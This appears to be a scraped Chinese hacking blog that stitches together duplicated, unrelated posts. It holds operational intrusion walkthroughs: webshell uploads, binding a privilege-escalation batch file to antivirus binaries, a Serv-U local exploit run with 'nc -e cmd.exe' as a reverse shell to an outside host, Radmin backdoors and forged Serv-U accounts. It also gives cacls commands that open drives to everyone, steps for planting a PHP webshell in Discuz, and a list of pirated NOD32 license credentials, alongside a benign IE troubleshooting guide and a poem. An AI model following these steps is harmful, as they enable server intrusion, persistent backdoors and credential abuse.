对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法,因为你的网站被人家放了马,你根本就没办法去阻止人家去插入,要是谁有好的解决方法记得告诉我。
另外,希望大家不要去搞破坏,那时我真的不愿看到的,也祝所有的网管们好运,希望你们不会碰上craker们。
--
--
巧用asp木马和KV2004得到管理员权限
重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。
前段时间动网的UPfile.asp漏洞可谓闹的沸沸扬扬,这个漏洞确实很厉害,相信不少新手和我一样种了不少后门在有动网的网站上,但是asp木马的权限确实很底,除了删点文章,删点图片好象没什么用了。不行不得到管理员权限简直就辜负了发现这个漏洞的高手们~v~。好,想办法提升权限,我找啊找!网上提升权限的方法几乎都用过了,都没什么用,补丁打的很全啊!接下来用findpass想解开管理员的密码,又失败,findpass要管理员权限才有用。用 pslist看看晕装的是瑞星+天网,网上的大部分工具遇上这个防御组合一般都没用了。种木马?不行一来
权限太底,二来在瑞星杀天网堵的包围下很少能活出来的。做个添加用户权限的bat文件想放到启动组中去,这个方法虽然有点傻但是有一定的可行性,晕又是权限不够加不进去。c盘下的 "Program Files" "winnt" "Documents and Settings"三个文件甲都没有写权限,更不要说注册表了。郁闷了,给管理员留了句话,然后匆匆下线。
第2天上来一看,嘿嘿图被改回来了,管理员应该发现了,这次更不容易得手。登上asp木马进去看了一下,昨天传上去的几个exe被删了,还好asp木马活下来了,咦!c盘多了文件甲叫 KV2004,原来管理员把瑞星卸了,安了个kv2004,进Program Files看看确实瑞星被卸了。(这里说一下,大部分的杀毒软件默认的安装路径c:\Program Files\,但是kv默认的安装路径是c:\kv2004\)到这里机会就来了我们可以把执行文件捆绑在kv2004上,跟随kv一起启动。因为 kv不在"Program Files" "winnt" "Documents and Settings"这三个文件甲中,很大可能我可以修改
或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限)
C:\>del c:\kv2004\GetLicense.htm
拒绝访问
奇怪了,再来看看文件甲属性
C:\>attrib c:\kv2004
S R C:\KV2004
哦是只读。
C:\>attrib -r -s c:\kv2004
ok!在试试
C:\>del c:\kv2004\GetLicense.htm
成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来,(注意多下种捆绑器,捆绑一
次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。
C:\>del c:\kv2004\KVSrvXP.exe
拒绝访问
可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名
C:\>ren c:\kv2004\KVSrvXP.exe kv.exe
OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。
4个小时后登上来用:
net user 起用的帐户
已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈!
我觉得入侵没什么固定的模式,具体情况具体分析,杀毒软件同样也可以帮我们忙,这里我只提供了一种思路。请大家指教。
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用 WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是 FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传 n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的 shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的 ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生 530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
CAcls命令在提权中的使用
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
F:safe溢出工具\sqlhello2>cacls
显示或者修改文件的访问控制表(ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
在命令中可以使用通配符指定多个文件。
标签: WEBSHELL提权大全
最新NOD32正版升级ID及KEY!!![随时更新]
作者:admin 日期:2006-12-24 05:24
以下ID测试可用:
UserName: AV-4431227
Password: hptgfky859
UserName: AV-4228428
Password: 9v52p0363i
UserName: AV-4438327
Password: crgpm2xuvj
UserName: AV-4163415
Password: t0h0v18mrx
UserName: AV-4163419
Password: rfodm5i0xf
UserName: AV-4210852
Password: 152m7ren76
UserName: AV-4239253
Password: 0p2rix679u
UserName: AV-4443342
Password: tsugh3sjj2
UserName: AV-4484855
Password: caw2081bbp
UserName: AV-4407870
Password: yq01pmi13p
UserName: AV-4156126
Password: b1y2urpe2q
UserName: AV-4235397
Password: 0n6natysod
UserName: AV-4455189
Password: 9k7gfx2cr9
UserName: AV-4163420
Password: 9q4ii0dsyj
UserName: AV-4479240
Password: v5fmf84mpe
UserName: AV-4479246
Password: t5j8x2deq3
UserName: AV-4435985
Password: 0fo9uqo8w3
UserName: AV-4479790
Password: drypunjs92
UserName: AV-4432550
Password: 0815edgg8o
UserName: AV-4662098
Password: s7601r3pyq
UserName: AV-4662103
Password: 6c0uuc46fm
UserName: AV-4662107
Password: 32pnp7ig4o
UserName: AV-4662114
Password: frjcrbsgb8
UserName: AV-4662117
Password: erny8518cx
UserName: AV-4662116
Password: d7qpgf1hnx
UserName: AV-4662121
Password: bgcr21ej10
UserName: AV-4662144
Password: vphh4brd48
UserName: AV-4662152
Password: qvcopaeq31
UserName: AV-4662156
Password: p4v3t2igbs
UserName: AV-4662125
Password: qm5mwmg0iv
UserName: AV-4662581
Password: iuanhvhrgm
UserName: AV-4662577
Password: je49sr8p5w
UserName: AV-4662576
Password: 24n5edqbae
UserName: AV-4462481
Password: 1r13twsnq5
UserName: AV-4508068
Password: q7ipjm16xb
UserName: AV-4516881
Password: 2m6kcpfm1b
以上为22日最新更新!!!
绝对保证正版NOD32升级ID和KEY,如果用的好希望大家顶一下。谢谢
保证最新。最快。最正版!!!及时更新!!!
绝对保证正版NOD32升级ID和KEY,如果用的好希望大家顶一下。谢谢
如当天未更新,表明现在的ID和KEY都是可用的。
UserName: AV-4431227
Password: hptgfky859
UserName: AV-4228428
Password: 9v52p0363i
UserName: AV-4438327
Password: crgpm2xuvj
UserName: AV-4163415
Password: t0h0v18mrx
UserName: AV-4163419
Password: rfodm5i0xf
UserName: AV-4210852
Password: 152m7ren76
UserName: AV-4239253
Password: 0p2rix679u
UserName: AV-4443342
Password: tsugh3sjj2
UserName: AV-4484855
Password: caw2081bbp
UserName: AV-4407870
Password: yq01pmi13p
UserName: AV-4156126
Password: b1y2urpe2q
UserName: AV-4235397
Password: 0n6natysod
UserName: AV-4455189
Password: 9k7gfx2cr9
UserName: AV-4163420
Password: 9q4ii0dsyj
UserName: AV-4479240
Password: v5fmf84mpe
UserName: AV-4479246
Password: t5j8x2deq3
UserName: AV-4435985
Password: 0fo9uqo8w3
UserName: AV-4479790
Password: drypunjs92
UserName: AV-4432550
Password: 0815edgg8o
UserName: AV-4662098
Password: s7601r3pyq
UserName: AV-4662103
Password: 6c0uuc46fm
UserName: AV-4662107
Password: 32pnp7ig4o
UserName: AV-4662114
Password: frjcrbsgb8
UserName: AV-4662117
Password: erny8518cx
UserName: AV-4662116
Password: d7qpgf1hnx
UserName: AV-4662121
Password: bgcr21ej10
UserName: AV-4662144
Password: vphh4brd48
UserName: AV-4662152
Password: qvcopaeq31
UserName: AV-4662156
Password: p4v3t2igbs
UserName: AV-4662125
Password: qm5mwmg0iv
UserName: AV-4662581
Password: iuanhvhrgm
UserName: AV-4662577
Password: je49sr8p5w
UserName: AV-4662576
Password: 24n5edqbae
UserName: AV-4462481
Password: 1r13twsnq5
UserName: AV-4508068
Password: q7ipjm16xb
UserName: AV-4516881
Password: 2m6kcpfm1b
以上为22日最新更新!!!
绝对保证正版NOD32升级ID和KEY,如果用的好希望大家顶一下。谢谢
保证最新。最快。最正版!!!及时更新!!!
绝对保证正版NOD32升级ID和KEY,如果用的好希望大家顶一下。谢谢
如当天未更新,表明现在的ID和KEY都是可用的。
不能上网,但可以上QQ的解决办法
作者:admin 日期:2006-12-23 01:05
一、感染了病毒所致
这种情况往往表现在打开IE时,在IE界面的左下框里提示:正在打开网页,但老半天没响应。在任务管理器里查看进程,(进入方法,把鼠标放在任务栏上,按右键—任务管理器—进程)看看CPU的占用率如何,如果是100%,可以肯定,是感染了病毒,这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源。
找到后,最好把名称记录下来,然后点击结束,如果不能结束,则要启动到安全模式下把该东东删除,还要进入注册表里,(方法:开始—运行,输入regedit)在注册表对话框里,点编辑—查找,输入那个程序名,找到后,点鼠标右键删除,然后再进行几次的搜索,往往能彻底删除干净。
有很多的病毒,杀毒软件无能为力时,唯一的方法就是手动删除。
二、与设置代理服务器有关
有些筒子,出于某些方面考虑,在浏览器里设置了代理服务器(控制面板--Internet选项—连接—局域网设置—为LAN使用代理服务器),设置代理服务器是不影响QQ联网的,因为QQ用的是4000端口,而访问互联网使用的是80或8080端口。这就是很多的筒子们不明白为什么QQ能上,而网页不能打开的原因。而代理服务器一般不是很稳定,有时侯能上,有时候不能上。如果有这样设置的,请把代理取消就可以了。
三、DNS服务器解释出错
所谓DNS,即域名服务器(Domain Name Server),它把域名转换成计算机能够识别的IP地址,如深圳之www.sz.net.cn)对应的IP地址是219.133.46.54,深圳热www.szonline.net)对应的IP地址是202.96.154.6。如果DNS服务器出错,则无法进行域名解释,自然不能上网了。
如果是这种情况,有时候是网络服务接入商即ISP的问题,可打电话咨询ISP;有时候则是路由器或网卡的问题,无法与ISP的DNS服务连接。
这种情况的话,可把路由器关一会再开,或者重新设置路由器。或者是网卡无法自动搜寻到DNS的服务器地址,可以尝试用指定的DNS服务器地址。在网络的属性里进行,(控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址)。不同的ISP有不同的DNS地址,如电信常用的是202.96.134.133(主用) 202.96.128.68(备用)。
更新网卡的驱动程序或更换网卡也不失为一个思路。
四、系统文件丢失导致IE不能正常启动
这种现象颇为常见,由于:
1、系统的不稳定 表现为死机频繁、经常莫名重启、非法关机造成系统文件丢失;
2、软硬件的冲突 常表现为安装了某些程序引起网卡驱动的冲突或与IE的冲突。自从INTEL推出超线程CPU后,有一个突出的问题是XP SP1下的IE6与超线程产生冲突;
3、病毒的侵扰 导致系统文件损坏或丢失。
如果是第一种情况,可尝试修复系统,2K或XP系统下,放入原安装光盘(注意:一定要原安装光盘),在开始—运行里输入sfc /scanow,按回车。98的系统也可以用sfc命令进行检查。
如果是第二种情况,可以把最近安装的硬件或程序卸载,2K或XP的系统可以在机器启动后,长按F8,进入启动菜单,选择“最后一次正确的配置”,若是XP系统,还可以利用系统的还原功能,一般能很快解决问题。
如果是XP的系统因超线程CPU的原因,可以在BIOS里禁用超线程,或升级到SP2。(当然,XP如何升级SP2涉及到很多知识及要注意的问题,在此限于篇幅不再详述)。这种情况下,QQ里自带的TT浏览器一般能正常浏览,可改用一试。
如果是第三种情况,则要对系统盘进行全面的查杀病毒。
还有一种现象也需特别留意:就是能打开网站的首页,但不能打开二级链接,如果是这样,处理的方法是重新注册如下的DLL文件:
在开始—运行里输入:
regsvr32 Shdocvw.dll
regsvr32 Shell32.dll (注意这个命令,先不用输)
regsvr32 Oleaut32.dll
regsvr32 Actxprxy.dll
regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll
注意:每输入一条,按回车。第二个命令可以先不用输,输完这些命令后重新启动windows,如果发现无效,再重新输入一遍,这次输入第二个命令。还有,如果是98的系统,到微软的网站上下载这个文件也许更简单,这个文件的下载地址是:
http://download.microsoft.com/download/msn...us/mcrepair.exe
五、IE损坏
以上方法若果都不奏效,有可能是IE的内核损坏,虽经系统修复,亦无法弥补,那么重装IE就是最好的方法了。
如果是98或2K系统,IE的版本若是5.0,建议升级到6.0。
98的系统如果已经升级安装了6.0,那么在控制面板里点击添加/删除程序,将会弹出一个修复对话框,选择默认的修复,重新启动即可。
如果是2K+IE6.0或XP(自带的IE就是6.0的)的系统,重新IE有点麻烦,有两种方法:
1、打开注册表,展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{ 89820200-ECBD-11cf-8B85-00AA005B4383 },将IsInstalled的DWORD的值改为0即可
网页打不开 Windows的Hosts表是祸首(这个也有可能)
很多朋友在网上冲浪时,经常会遇到有些网页可以顺利地打开,而有些网页却无论如何也打不开,而在其它电脑中却又可以轻松地打开。出现这种情况,最大的可能就是你的IE浏览器中招了,而Hosts表文件往往是祸之源头。
一、什么是Hosts表文件
Hosts表文件是一个没有扩展名的文件,但是它属于文本文件格式的文件。你可以使用记事本程序对其进行编辑。Hosts表文件中存放的是一些常用的网站主机的域名和其对应的IP地址。当我们在使用浏览器浏览一个网站时,在地址栏中输入网站的域名并回车后,系统必须通过某种渠道将这个域名转换为其对应的唯一的IP地址,这项工作通常是由DNS(域名解析服务器)服务器来完成的。而在系统将域名将给DNS服务器处理之前总是先在检查本地的Hosts表文件,看其中是否已经有相应的域名与IP地址的对应关系,如果有就会直接采用,因而会节约大量时间。
正因为这个原因,假如Hosts表文件中的某个域名与IP地址产生了错误的对应,当你在浏览器中输入这个域名试图打开其对应的网页时,就会出现打不开的情况,而那些没有映射错,或是没有在Hosts表中有相应记录的网站则可以正常地打开。这就是上面我们提到的为什么有些网址不能打开,而在其他电脑中可以顺利地打开的原因之所在。很多恶意程序经常会闹这样的恶作剧。
二、中招后的解决方案
知道了原理后,假如我们的浏览器中招而导致某些网站不能正常打开的话,我们就可以通过修改Hosts表文件来解决了。Hosts表文件在系统中的位置,Windows 9X系统存放在C:Windows目录,Windows NT/2000系统,其保存在c:winntsystem32driversetc目录,Windows XP系统保存在c:windowssystem32driversetc,如果找不到的话,可以通过系统的搜索工具进行搜索。找到后,直接用记事本将其打开,然后将除了“#”开头的其它行内容全部删除,例如“127.0.0.1 onlinestore.smgbb.cn”,最后单击“文件→保存”将其保存即可。当然,你也可以选择性地删除那些被屏蔽了的而你又想访问的网站,这样其他被屏蔽的网站则不会受影响。
如果你嫌上述手工方法太笨拙,你也可以通过专门的工具来达到目的。上网助手2005(下载地址:http://dl.3721.net/download/assist4.exe)就可以让你轻松地修复Hosts表文件了:
下载并安装了上网助手后,在IE地址栏中找到“上网助手”图标,单击右侧的黑三角形,选择“修复IE→IE修复专家”,在打开的窗口中选择“编辑Hosts表”选项卡。
如果你不想一条一条地更改,直接单击“清空HOST表”按钮,最后单击“立即保存”按钮即可。否则你可以在列表中勾选那些被屏蔽掉而不能访问的网站域名,再单击“删除→立即保存”按钮。
三、经验之谈
当你遇到某些网站打不开,而有些网站可以顺利地打开,除了在IE浏览器中设置了网址过滤之外,Hosts表文件被动了手脚就是最可疑之处了。通过上面的方法,一般都可以轻松地解决。鉴于此,一些烦人的网站(例如,百度插件安装页),我们倒可以利用这个特性将其“屏蔽”掉,方法很简单,只要在Hosts表文件中的尾行中追加类似于:127.0.0.1 bar.baidu.com(127.0.0.1与bar.baidu.com之间用空格分隔开)一行,最后保存并退出Hosts表文件即可。你也可以使用上网助手的Hosts表文件编辑功能来操作,在图1所示的窗口中单击“添加”按钮,然后在下面的“IP地址”和“域名”栏中分别输入127.0.0.1 和bar.baidu.com,最后单击“立即保存”即可。按同样的方法,可以将其他不想让其在本台电脑中可以访问的网站“屏蔽”掉。
这种情况往往表现在打开IE时,在IE界面的左下框里提示:正在打开网页,但老半天没响应。在任务管理器里查看进程,(进入方法,把鼠标放在任务栏上,按右键—任务管理器—进程)看看CPU的占用率如何,如果是100%,可以肯定,是感染了病毒,这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源。
找到后,最好把名称记录下来,然后点击结束,如果不能结束,则要启动到安全模式下把该东东删除,还要进入注册表里,(方法:开始—运行,输入regedit)在注册表对话框里,点编辑—查找,输入那个程序名,找到后,点鼠标右键删除,然后再进行几次的搜索,往往能彻底删除干净。
有很多的病毒,杀毒软件无能为力时,唯一的方法就是手动删除。
二、与设置代理服务器有关
有些筒子,出于某些方面考虑,在浏览器里设置了代理服务器(控制面板--Internet选项—连接—局域网设置—为LAN使用代理服务器),设置代理服务器是不影响QQ联网的,因为QQ用的是4000端口,而访问互联网使用的是80或8080端口。这就是很多的筒子们不明白为什么QQ能上,而网页不能打开的原因。而代理服务器一般不是很稳定,有时侯能上,有时候不能上。如果有这样设置的,请把代理取消就可以了。
三、DNS服务器解释出错
所谓DNS,即域名服务器(Domain Name Server),它把域名转换成计算机能够识别的IP地址,如深圳之www.sz.net.cn)对应的IP地址是219.133.46.54,深圳热www.szonline.net)对应的IP地址是202.96.154.6。如果DNS服务器出错,则无法进行域名解释,自然不能上网了。
如果是这种情况,有时候是网络服务接入商即ISP的问题,可打电话咨询ISP;有时候则是路由器或网卡的问题,无法与ISP的DNS服务连接。
这种情况的话,可把路由器关一会再开,或者重新设置路由器。或者是网卡无法自动搜寻到DNS的服务器地址,可以尝试用指定的DNS服务器地址。在网络的属性里进行,(控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址)。不同的ISP有不同的DNS地址,如电信常用的是202.96.134.133(主用) 202.96.128.68(备用)。
更新网卡的驱动程序或更换网卡也不失为一个思路。
四、系统文件丢失导致IE不能正常启动
这种现象颇为常见,由于:
1、系统的不稳定 表现为死机频繁、经常莫名重启、非法关机造成系统文件丢失;
2、软硬件的冲突 常表现为安装了某些程序引起网卡驱动的冲突或与IE的冲突。自从INTEL推出超线程CPU后,有一个突出的问题是XP SP1下的IE6与超线程产生冲突;
3、病毒的侵扰 导致系统文件损坏或丢失。
如果是第一种情况,可尝试修复系统,2K或XP系统下,放入原安装光盘(注意:一定要原安装光盘),在开始—运行里输入sfc /scanow,按回车。98的系统也可以用sfc命令进行检查。
如果是第二种情况,可以把最近安装的硬件或程序卸载,2K或XP的系统可以在机器启动后,长按F8,进入启动菜单,选择“最后一次正确的配置”,若是XP系统,还可以利用系统的还原功能,一般能很快解决问题。
如果是XP的系统因超线程CPU的原因,可以在BIOS里禁用超线程,或升级到SP2。(当然,XP如何升级SP2涉及到很多知识及要注意的问题,在此限于篇幅不再详述)。这种情况下,QQ里自带的TT浏览器一般能正常浏览,可改用一试。
如果是第三种情况,则要对系统盘进行全面的查杀病毒。
还有一种现象也需特别留意:就是能打开网站的首页,但不能打开二级链接,如果是这样,处理的方法是重新注册如下的DLL文件:
在开始—运行里输入:
regsvr32 Shdocvw.dll
regsvr32 Shell32.dll (注意这个命令,先不用输)
regsvr32 Oleaut32.dll
regsvr32 Actxprxy.dll
regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll
注意:每输入一条,按回车。第二个命令可以先不用输,输完这些命令后重新启动windows,如果发现无效,再重新输入一遍,这次输入第二个命令。还有,如果是98的系统,到微软的网站上下载这个文件也许更简单,这个文件的下载地址是:
http://download.microsoft.com/download/msn...us/mcrepair.exe
五、IE损坏
以上方法若果都不奏效,有可能是IE的内核损坏,虽经系统修复,亦无法弥补,那么重装IE就是最好的方法了。
如果是98或2K系统,IE的版本若是5.0,建议升级到6.0。
98的系统如果已经升级安装了6.0,那么在控制面板里点击添加/删除程序,将会弹出一个修复对话框,选择默认的修复,重新启动即可。
如果是2K+IE6.0或XP(自带的IE就是6.0的)的系统,重新IE有点麻烦,有两种方法:
1、打开注册表,展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{ 89820200-ECBD-11cf-8B85-00AA005B4383 },将IsInstalled的DWORD的值改为0即可
网页打不开 Windows的Hosts表是祸首(这个也有可能)
很多朋友在网上冲浪时,经常会遇到有些网页可以顺利地打开,而有些网页却无论如何也打不开,而在其它电脑中却又可以轻松地打开。出现这种情况,最大的可能就是你的IE浏览器中招了,而Hosts表文件往往是祸之源头。
一、什么是Hosts表文件
Hosts表文件是一个没有扩展名的文件,但是它属于文本文件格式的文件。你可以使用记事本程序对其进行编辑。Hosts表文件中存放的是一些常用的网站主机的域名和其对应的IP地址。当我们在使用浏览器浏览一个网站时,在地址栏中输入网站的域名并回车后,系统必须通过某种渠道将这个域名转换为其对应的唯一的IP地址,这项工作通常是由DNS(域名解析服务器)服务器来完成的。而在系统将域名将给DNS服务器处理之前总是先在检查本地的Hosts表文件,看其中是否已经有相应的域名与IP地址的对应关系,如果有就会直接采用,因而会节约大量时间。
正因为这个原因,假如Hosts表文件中的某个域名与IP地址产生了错误的对应,当你在浏览器中输入这个域名试图打开其对应的网页时,就会出现打不开的情况,而那些没有映射错,或是没有在Hosts表中有相应记录的网站则可以正常地打开。这就是上面我们提到的为什么有些网址不能打开,而在其他电脑中可以顺利地打开的原因之所在。很多恶意程序经常会闹这样的恶作剧。
二、中招后的解决方案
知道了原理后,假如我们的浏览器中招而导致某些网站不能正常打开的话,我们就可以通过修改Hosts表文件来解决了。Hosts表文件在系统中的位置,Windows 9X系统存放在C:Windows目录,Windows NT/2000系统,其保存在c:winntsystem32driversetc目录,Windows XP系统保存在c:windowssystem32driversetc,如果找不到的话,可以通过系统的搜索工具进行搜索。找到后,直接用记事本将其打开,然后将除了“#”开头的其它行内容全部删除,例如“127.0.0.1 onlinestore.smgbb.cn”,最后单击“文件→保存”将其保存即可。当然,你也可以选择性地删除那些被屏蔽了的而你又想访问的网站,这样其他被屏蔽的网站则不会受影响。
如果你嫌上述手工方法太笨拙,你也可以通过专门的工具来达到目的。上网助手2005(下载地址:http://dl.3721.net/download/assist4.exe)就可以让你轻松地修复Hosts表文件了:
下载并安装了上网助手后,在IE地址栏中找到“上网助手”图标,单击右侧的黑三角形,选择“修复IE→IE修复专家”,在打开的窗口中选择“编辑Hosts表”选项卡。
如果你不想一条一条地更改,直接单击“清空HOST表”按钮,最后单击“立即保存”按钮即可。否则你可以在列表中勾选那些被屏蔽掉而不能访问的网站域名,再单击“删除→立即保存”按钮。
三、经验之谈
当你遇到某些网站打不开,而有些网站可以顺利地打开,除了在IE浏览器中设置了网址过滤之外,Hosts表文件被动了手脚就是最可疑之处了。通过上面的方法,一般都可以轻松地解决。鉴于此,一些烦人的网站(例如,百度插件安装页),我们倒可以利用这个特性将其“屏蔽”掉,方法很简单,只要在Hosts表文件中的尾行中追加类似于:127.0.0.1 bar.baidu.com(127.0.0.1与bar.baidu.com之间用空格分隔开)一行,最后保存并退出Hosts表文件即可。你也可以使用上网助手的Hosts表文件编辑功能来操作,在图1所示的窗口中单击“添加”按钮,然后在下面的“IP地址”和“域名”栏中分别输入127.0.0.1 和bar.baidu.com,最后单击“立即保存”即可。按同样的方法,可以将其他不想让其在本台电脑中可以访问的网站“屏蔽”掉。
咏蝶
作者:admin 日期:2006-12-22 02:28
你斑斓的色彩
像一道绚丽的彩虹
突然
出现我面前
你的美丽
我早已听闻
那传说中的神奇
是你吗
我曾在浩淼的宇宙里将你觅寻
我曾在山长水远中将你苦思
踏破了一生的平静
你却悄然来了
你带着绚烂的美丽
幸福,便像一袭斑斓的彩衣
你快乐吗?那是你吗?
我于无尽的惊喜里咀嚼幸福的永恒
我倔强的站在街头
我冷眼相看身旁的往来人潮
我不再爱
那无边的喧嚣和虚空
宁愿自己只是那一片秋天里的落叶
正从繁华里凋谢
我不再爱
那暗涌在繁华背后的虚伪和丑陋
多么可耻
多么可悲
我宁愿一年四季只穿一袭破衣
乞丐似
但我并非乞丐
我只是物欲里的一个变异因素
我宁愿自己从不曾出生
仍然是土地下的泥石一颗
我从不曾有知有觉
但却最真实无华
像一道绚丽的彩虹
突然
出现我面前
你的美丽
我早已听闻
那传说中的神奇
是你吗
我曾在浩淼的宇宙里将你觅寻
我曾在山长水远中将你苦思
踏破了一生的平静
你却悄然来了
你带着绚烂的美丽
幸福,便像一袭斑斓的彩衣
你快乐吗?那是你吗?
我于无尽的惊喜里咀嚼幸福的永恒
我倔强的站在街头
我冷眼相看身旁的往来人潮
我不再爱
那无边的喧嚣和虚空
宁愿自己只是那一片秋天里的落叶
正从繁华里凋谢
我不再爱
那暗涌在繁华背后的虚伪和丑陋
多么可耻
多么可悲
我宁愿一年四季只穿一袭破衣
乞丐似
但我并非乞丐
我只是物欲里的一个变异因素
我宁愿自己从不曾出生
仍然是土地下的泥石一颗
我从不曾有知有觉
但却最真实无华
标签: 咏蝶
DZ5.0通用后台拿SHLL的五步曲
作者:天晴无名氏 日期:2006-12-18 06:52
1。进入后台
2。论坛管理-模版编辑
3。 在Actions里面插入一句话木马 注:一句话PHP专用的
4。用一句话木马客户端连接上
http://www.xxx.com/templates/default/actions.lang.php
5。用PHP一句话的客户端写入webshell 。
2。论坛管理-模版编辑
3。 在Actions里面插入一句话木马 注:一句话PHP专用的
4。用一句话木马客户端连接上
http://www.xxx.com/templates/default/actions.lang.php
5。用PHP一句话的客户端写入webshell 。
标签: DZ5.0拿SHLL
利用HTTP指令进行攻击之Cache篇
作者:天晴无名氏 日期:2006-12-18 06:52
技术背景
